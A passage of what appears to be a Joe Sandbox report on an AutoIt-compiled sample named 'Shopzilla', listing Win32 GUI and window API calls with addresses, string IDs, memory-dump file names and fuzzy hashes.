                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C28EBF
                                              • CharNextW.USER32(0000014E), ref: 00C28EEE
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C28F2F
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C28F45
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C28F56
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C28F73
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00C28FC5
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C28FDB
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C2900C
                                              • _memset.LIBCMT ref: 00C29031
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C2907A
                                              • _memset.LIBCMT ref: 00C290D9
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C29103
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C2915B
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00C29208
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00C2922A
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C29274
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C292A1
                                              • DrawMenuBar.USER32(?), ref: 00C292B0
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00C292D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0
                                              • API String ID: 1073566785-4108050209
                                              • Opcode ID: fb34fa47f1e51cc549931d1bd9309effb29cd0d76c1a517617e72017ba78354b
                                              • Instruction ID: 10a4905f29f651c065ac1f5e2919a759730fac734c35601c4aa5b46e852a5890
                                              • Opcode Fuzzy Hash: fb34fa47f1e51cc549931d1bd9309effb29cd0d76c1a517617e72017ba78354b
                                              • Instruction Fuzzy Hash: FAE19F75901229AFDF209F91DC85FEE7BB8FF05710F10815AF925AA690DB708A84DF60
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00C24DCF
                                              • GetDesktopWindow.USER32 ref: 00C24DE4
                                              • GetWindowRect.USER32(00000000), ref: 00C24DEB
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C24E4D
                                              • DestroyWindow.USER32(?), ref: 00C24E79
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C24EA2
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C24EC0
                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C24EE6
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00C24EFB
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C24F0E
                                              • IsWindowVisible.USER32(?), ref: 00C24F2E
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C24F49
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C24F5D
                                              • GetWindowRect.USER32(?,?), ref: 00C24F75
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00C24F9B
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00C24FB5
                                              • CopyRect.USER32(?,?), ref: 00C24FCC
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00C25037
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: 02ebdb4b1e223c250846e8c0dcc24f4ff2185581e9846c12f1b2907013069589
                                              • Instruction ID: 25d5c6fe53d284b6be4aece87571c905edf68d5b58b51f4dbaf45488bc3fed7a
                                              • Opcode Fuzzy Hash: 02ebdb4b1e223c250846e8c0dcc24f4ff2185581e9846c12f1b2907013069589
                                              • Instruction Fuzzy Hash: 9DB18971608750AFDB14DF64D845B6EBBE4BF84310F008A1CF9999B2A1DB71ED05CB92
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C04809
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C0482F
                                              • _wcscpy.LIBCMT ref: 00C0485D
                                              • _wcscmp.LIBCMT ref: 00C04868
                                              • _wcscat.LIBCMT ref: 00C0487E
                                              • _wcsstr.LIBCMT ref: 00C04889
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C048A5
                                              • _wcscat.LIBCMT ref: 00C048EE
                                              • _wcscat.LIBCMT ref: 00C048F5
                                              • _wcsncpy.LIBCMT ref: 00C04920
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 699586101-1459072770
                                              • Opcode ID: 2519551f74804be60ce493502fe84667d093b538f2c0111884128d59eed4f609
                                              • Instruction ID: 523d3664bdb383a49ca56201a8ef7a976e48d7294cda9b2b251369b1ecd15946
                                              • Opcode Fuzzy Hash: 2519551f74804be60ce493502fe84667d093b538f2c0111884128d59eed4f609
                                              • Instruction Fuzzy Hash: E341F372A04204BBEB15BB649C43FBF77ECDF41710F1045AEF904A61D2EB749A0186A5
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BA2C8C
                                              • GetSystemMetrics.USER32(00000007), ref: 00BA2C94
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BA2CBF
                                              • GetSystemMetrics.USER32(00000008), ref: 00BA2CC7
                                              • GetSystemMetrics.USER32(00000004), ref: 00BA2CEC
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BA2D09
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BA2D19
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BA2D4C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BA2D60
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00BA2D7E
                                              • GetStockObject.GDI32(00000011), ref: 00BA2D9A
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA2DA5
                                                • Part of subcall function 00BA2714: GetCursorPos.USER32(?), ref: 00BA2727
                                                • Part of subcall function 00BA2714: ScreenToClient.USER32(00C667B0,?), ref: 00BA2744
                                                • Part of subcall function 00BA2714: GetAsyncKeyState.USER32(00000001), ref: 00BA2769
                                                • Part of subcall function 00BA2714: GetAsyncKeyState.USER32(00000002), ref: 00BA2777
                                              • SetTimer.USER32(00000000,00000000,00000028,00BA1473), ref: 00BA2DCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: aa3b8a01bf27640aadb280aa6bb565509354484cbea328dea8c9246df67b1215
                                              • Instruction ID: 6ada0515d5dcbe548fc530230936489661b4a5bcde1968836422e4646eb9ecd4
                                              • Opcode Fuzzy Hash: aa3b8a01bf27640aadb280aa6bb565509354484cbea328dea8c9246df67b1215
                                              • Instruction Fuzzy Hash: 0FB16D71A0420AAFDB14DFA8DC95BADBBF5FB08324F104169FA15A7290DB74E850CF94
                                              APIs
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              • GetForegroundWindow.USER32(00C30980,?,?,?,?,?), ref: 00BC040E
                                              • IsWindow.USER32(?), ref: 00BF64A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$Foreground_memmove
                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                              • API String ID: 3828923867-1919597938
                                              • Opcode ID: 78ced484f1246ab99cacb164187da0ee10ffce63633524f317be1216fcbc4727
                                              • Instruction ID: 56c34ceb633796080dcb556c49bfda9e78e5d9e174fcd273568fb97781294ead
                                              • Opcode Fuzzy Hash: 78ced484f1246ab99cacb164187da0ee10ffce63633524f317be1216fcbc4727
                                              • Instruction Fuzzy Hash: 78D1D470104206EBCB08FF24C491ABABBE4FF54344F504A9DFA56536A2DB70E99DCB91
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00C24274
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C24334
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 3974292440-719923060
                                              • Opcode ID: e7002a333c53c4fc30756b9cbe8bc5a55e4b2671ff903cf555858f6c905cbdc2
                                              • Instruction ID: 29564d804bb3e6305b25bfbf47624ca6e13f8d1ad89505cfaad26dd4176fbf82
                                              • Opcode Fuzzy Hash: e7002a333c53c4fc30756b9cbe8bc5a55e4b2671ff903cf555858f6c905cbdc2
                                              • Instruction Fuzzy Hash: 45A16B702142119FCB18EF21D852F7AB3E5FF85314F104AA8B9A69B6D2DB70ED09CB51
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00BFAF5E
                                              • __swprintf.LIBCMT ref: 00BFAFFF
                                              • _wcscmp.LIBCMT ref: 00BFB012
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00BFB067
                                              • _wcscmp.LIBCMT ref: 00BFB0A3
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00BFB0DA
                                              • GetDlgCtrlID.USER32(?), ref: 00BFB12C
                                              • GetWindowRect.USER32(?,?), ref: 00BFB162
                                              • GetParent.USER32(?), ref: 00BFB180
                                              • ScreenToClient.USER32(00000000), ref: 00BFB187
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00BFB201
                                              • _wcscmp.LIBCMT ref: 00BFB215
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00BFB23B
                                              • _wcscmp.LIBCMT ref: 00BFB24F
                                                • Part of subcall function 00BC378E: _iswctype.LIBCMT ref: 00BC3796
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              • API String ID: 3744389584-679674701
                                              • Opcode ID: d5ce0a88c3e1fbe72f66ddb1d7bd4ed6d58bb39d281bc8689d9fdff53bf645cb
                                              • Instruction ID: 24e9e075db4e9ccd2e797eb9ea99bbee67b50c1e277b9a839524e619f2651dec
                                              • Opcode Fuzzy Hash: d5ce0a88c3e1fbe72f66ddb1d7bd4ed6d58bb39d281bc8689d9fdff53bf645cb
                                              • Instruction Fuzzy Hash: 1CA1CD7120420AABD714DF64C894FBEBBE8FF44354F108669FA99D3190DB30EA59CB91
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00BFB894
                                              • _wcscmp.LIBCMT ref: 00BFB8A5
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00BFB8CD
                                              • CharUpperBuffW.USER32(?,00000000), ref: 00BFB8EA
                                              • _wcscmp.LIBCMT ref: 00BFB908
                                              • _wcsstr.LIBCMT ref: 00BFB919
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00BFB951
                                              • _wcscmp.LIBCMT ref: 00BFB961
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00BFB988
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00BFB9D1
                                              • _wcscmp.LIBCMT ref: 00BFB9E1
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00BFBA09
                                              • GetWindowRect.USER32(00000004,?), ref: 00BFBA72
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: 140b8c175cddb05ffda3f389e5547f87a39bdc30aa5aacce20ec25603e3ad739
                                              • Instruction ID: 87b3d43d6172fd927cbb3803204da059e370d481dcd87c7fc8d35f024362f2c2
                                              • Opcode Fuzzy Hash: 140b8c175cddb05ffda3f389e5547f87a39bdc30aa5aacce20ec25603e3ad739
                                              • Instruction Fuzzy Hash: BB819E72108209ABDB04DF14C991FBA7BECEF84714F1484A9FE859B096DB70DD49CBA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              • API String ID: 1038674560-1810252412
                                              • Opcode ID: 1e87f934a850bbb20d52a3e4ffd8332aec02b4fcc4730945362cd35dec300b5d
                                              • Instruction ID: e5699eedd696dccc372ca6bdff731cc0aabbddd1158f248fb672a9a907fdc26e
                                              • Opcode Fuzzy Hash: 1e87f934a850bbb20d52a3e4ffd8332aec02b4fcc4730945362cd35dec300b5d
                                              • Instruction Fuzzy Hash: EB31C135940209AADA10FA64CC93EFD73E8EF10752FA005BAF902720D2EFA15E4C9755
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 00BFC98D
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00BFC99F
                                              • SetWindowTextW.USER32(?,?), ref: 00BFC9B6
                                              • GetDlgItem.USER32(?,000003EA), ref: 00BFC9CB
                                              • SetWindowTextW.USER32(00000000,?), ref: 00BFC9D1
                                              • GetDlgItem.USER32(?,000003E9), ref: 00BFC9E1
                                              • SetWindowTextW.USER32(00000000,?), ref: 00BFC9E7
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00BFCA08
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00BFCA22
                                              • GetWindowRect.USER32(?,?), ref: 00BFCA2B
                                              • SetWindowTextW.USER32(?,?), ref: 00BFCA96
                                              • GetDesktopWindow.USER32 ref: 00BFCA9C
                                              • GetWindowRect.USER32(00000000), ref: 00BFCAA3
                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00BFCAEF
                                              • GetClientRect.USER32(?,?), ref: 00BFCAFC
                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00BFCB21
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00BFCB4C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                              • String ID:
                                              • API String ID: 3869813825-0
                                              • Opcode ID: 2bae1a5af217c3f4b4dd994c98672264282447b1d3745faa367bd2a2c3fffe4c
                                              • Instruction ID: 8443e51abb17773165fe39f816393819a13ae2e47f2f8a704fd099d886c5e4b6
                                              • Opcode Fuzzy Hash: 2bae1a5af217c3f4b4dd994c98672264282447b1d3745faa367bd2a2c3fffe4c
                                              • Instruction Fuzzy Hash: 86517B3190070DAFDB20DFA8CE86B6EBBF5FF44705F104958E686A39A4C774A958CB50
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00C154C3
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00C154CE
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00C154D9
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00C154E4
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00C154EF
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00C154FA
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00C15505
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00C15510
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00C1551B
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00C15526
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00C15531
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00C1553C
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00C15547
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00C15552
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00C1555D
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00C15568
                                              • GetCursorInfo.USER32(?), ref: 00C15578
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$Info
                                              • String ID:
                                              • API String ID: 2577412497-0
                                              • Opcode ID: 03b00c292a03a507f73ddeda31e5ad93bb3ccd236adac5e5e97695b23f8fc061
                                              • Instruction ID: 0c1e33a807955e0928f5126e49267652db54085b0977734850a6f0e6d8164db1
                                              • Opcode Fuzzy Hash: 03b00c292a03a507f73ddeda31e5ad93bb3ccd236adac5e5e97695b23f8fc061
                                              • Instruction Fuzzy Hash: 693115B1D08319AADF109FB68C8999FBFE9FF44750F50452AA51CE7280DB78A5408F91
                                              APIs
                                              • _memset.LIBCMT ref: 00C2A646
                                              • DestroyWindow.USER32(00000000,?), ref: 00C2A6C0
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C2A73A
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C2A75C
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C2A76F
                                              • DestroyWindow.USER32(00000000), ref: 00C2A791
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BA0000,00000000), ref: 00C2A7C8
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C2A7E1
                                              • GetDesktopWindow.USER32 ref: 00C2A7FA
                                              • GetWindowRect.USER32(00000000), ref: 00C2A801
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C2A819
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C2A831
                                                • Part of subcall function 00BA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BA29BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 1297703922-3619404913
                                              • Opcode ID: e3e2ea65e422f8525493bcf08ae9fb39aaf9d668ce8815ac43d668d6d7f99b65
                                              • Instruction ID: 791d9b6334391ceb6801afeca7849f47add8e17672e48442d30b12d952d9b969
                                              • Opcode Fuzzy Hash: e3e2ea65e422f8525493bcf08ae9fb39aaf9d668ce8815ac43d668d6d7f99b65
                                              • Instruction Fuzzy Hash: EF718671140305AFEB21CF28DC59FAA7BF9FB88704F140A1DF995872A1D770AA06CB52
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • DragQueryPoint.SHELL32(?,?), ref: 00C2CA4A
                                                • Part of subcall function 00C2AF24: ClientToScreen.USER32(?,?), ref: 00C2AF4D
                                                • Part of subcall function 00C2AF24: GetWindowRect.USER32(?,?), ref: 00C2AFC3
                                                • Part of subcall function 00C2AF24: PtInRect.USER32(?,?,00C2C437), ref: 00C2AFD3
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00C2CAB3
